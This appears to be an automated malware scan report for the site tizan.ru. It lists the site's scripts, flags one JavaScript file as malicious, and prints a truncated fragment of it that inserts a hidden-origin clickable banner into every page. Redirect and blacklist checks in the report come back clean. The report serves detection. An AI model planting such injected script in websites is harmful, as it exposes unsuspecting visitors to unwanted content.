Scanned pages/files
| Request | Server response | Status |
http://www.tizan.ru/ | 200 OK Content-Length: 35558 Content-Type: text/html | clean |
http://www.tizan.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://www.tizan.ru/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://www.tizan.ru/plugins/content/mavikthumbnails/slimbox/js/slimbox.js | 200 OK Content-Length: 7073 Content-Type: application/javascript | clean |
http://www.tizan.ru/components/com_imageshow/jscript/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://www.tizan.ru/administrator/components/com_imageshow/assets/js/jsn_ext_ultils.js | 200 OK Content-Length: 3114 Content-Type: application/javascript | clean |
http://www.tizan.ru/administrator/components/com_imageshow/assets/js/imageshow.js | 200 OK Content-Length: 43169 Content-Type: application/javascript | clean |
http://www.tizan.ru/img/jidamu.js | 200 OK Content-Length: 112055 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\ if (!mdom) { newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>"; if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); } } } Antivirus reports:
| ||
http://www.tizan.ru/index.php/news-today | 200 OK Content-Length: 72020 Content-Type: text/html | clean |
http://www.tizan.ru/index.php/cats-male | 200 OK Content-Length: 32453 Content-Type: text/html | clean |
http://www.tizan.ru/index.php/cats-femaly | 200 OK Content-Length: 47279 Content-Type: text/html | clean |
http://www.tizan.ru/index.php/kitten-our | 200 OK Content-Length: 30243 Content-Type: text/html | clean |
http://www.tizan.ru/index.php/archiv | 200 OK Content-Length: 40678 Content-Type: text/html | clean |
http://www.tizan.ru/index.php/kitten-sell | 200 OK Content-Length: 27220 Content-Type: text/html | clean |
http://www.tizan.ru/index.php/slideshow | 200 OK Content-Length: 29147 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tizan.ru
Result:
GET / HTTP/1.1
Host: tizan.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tizan.ru
Referer: http://www.google.com/search?q=tizan.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tizan.ru
Referer: http://www.google.com/search?q=tizan.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tizan.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tizan.ru/
Result: tizan.ru is not infected or malware details are not published yet.
Result: tizan.ru is not infected or malware details are not published yet.